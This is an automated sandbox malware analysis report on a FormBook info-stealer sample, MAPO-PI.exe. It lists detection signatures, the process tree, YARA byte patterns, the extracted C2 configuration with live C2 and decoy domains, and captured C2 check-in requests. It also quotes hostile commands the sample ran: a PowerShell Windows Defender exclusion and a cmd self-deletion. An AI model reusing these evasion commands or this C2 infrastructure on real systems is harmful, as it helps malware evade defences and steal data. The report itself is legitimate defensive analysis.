
Windows Analysis Report MAPO-PI.exe

Overview

General Information

Sample Name: MAPO-PI.exe
Analysis ID: 510736
MD5: c619bbbe3c374c8fd3e9f2c26d087496
SHA1: a8f7e80f2c8e7687789f2267935610f81bc773d4
SHA256: 260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • MAPO-PI.exe (PID: 3868 cmdline: 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: C619BBBE3C374C8FD3E9F2C26D087496)
    • powershell.exe (PID: 2592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MAPO-PI.exe (PID: 5128 cmdline: C:\Users\user\Desktop\MAPO-PI.exe MD5: C619BBBE3C374C8FD3E9F2C26D087496)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 980 cmdline: /c del 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
3.0.MAPO-PI.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.MAPO-PI.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.MAPO-PI.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
3.0.MAPO-PI.exe.400000.6.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.MAPO-PI.exe.400000.6.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Powershell Defender Exclusion
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe', ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe', ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132799056056937018.2592.DefaultAppDomain.powershell

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: MAPO-PI.exe; Virustotal: Detection: 30%
Source: MAPO-PI.exe; ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 3.0.MAPO-PI.exe.400000.8.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.MAPO-PI.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.MAPO-PI.exe.400000.6.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.MAPO-PI.exe.400000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: MAPO-PI.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: MAPO-PI.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb; source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL; source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP; source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: MAPO-PI.exe, cmmon32.exe

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 159.65.10.143 80
Source: C:\Windows\explorer.exe; Domain query: www.lifeinformpodcast.com
Source: C:\Windows\explorer.exe; Domain query: www.transforming-leadership.com
Source: C:\Windows\explorer.exe; Domain query: www.diofis.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Network Connect: 109.232.217.55 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.diofis.com/rigx/
Source: Joe Sandbox View; ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View; ASN Name: AEROTEK-ASTR AEROTEK-ASTR
Source: global traffic; HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1; Host: www.lifeinformpodcast.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1; Host: www.transforming-leadership.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1; Host: www.diofis.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Thu, 28 Oct 2021 05:41:15 GMT; Content-Type: text/html; Content-Length: 275; ETag: "61797038-113"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 28 Oct 2021 05:41:35 GMT; Server: Apache; Expires: Wed, 11 Jan 1984 05:00:00 GMT; Cache-Control: no-cache, must-revalidate, max-age=0; Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"; Referrer-Policy: no-referrer-when-downgrade; Connection: close; Transfer-Encoding: chunked; Content-Type: text/html; charset=UTF-8
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; x-powered-by: PHP/7.4.24; content-type: text/html; charset=UTF-8; expires: Wed, 11 Jan 1984 05:00:00 GMT; cache-control: no-cache, must-revalidate, max-age=0; link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"; x-litespeed-cache: miss; content-length: 33607; date: Thu, 28 Oct 2021 05:41:56 GMT
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://gmpg.org/xfn/11
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp; String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/#logo
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/#organization
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/#website
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/elma-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/maydanoz-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/meyve-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi-2/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/rahatlatici-cay/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/10/24/yulafli-kahvalti/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/11/01/cennet-tatlisi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/11/01/cikolatali-toplar/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/11/01/ketojenik-beslenme/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/11/19/aspir-yagi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/?s=
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/bize-ulasin/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/blog/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/category/guncel-diyet-meseleleri/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/category/sporcu-beslenmesi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/category/tarifler/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/comments/feed/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/feed/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/hakkimizda/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/hizmetlerimiz/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp; String found in binary or memory: http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/partnerlerimiz/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/wlwmanifest.xml
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-json/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/xmlrpc.php?rsd
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com?sccss=1&#038;ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://api.w.org/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://m0n.co/ga
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://schema.org
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-FE02SN0XC6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.monsterinsights.com/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
          Source: unknown | DNS traffic detected: queries for: www.lifeinformpodcast.com
          Source: global traffic | HTTP traffic detected:
              GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1
              Host: www.lifeinformpodcast.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii: (seven null bytes, nothing printable)
          Source: global traffic | HTTP traffic detected:
              GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1
              Host: www.transforming-leadership.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii: (seven null bytes, nothing printable)
          Source: global traffic | HTTP traffic detected:
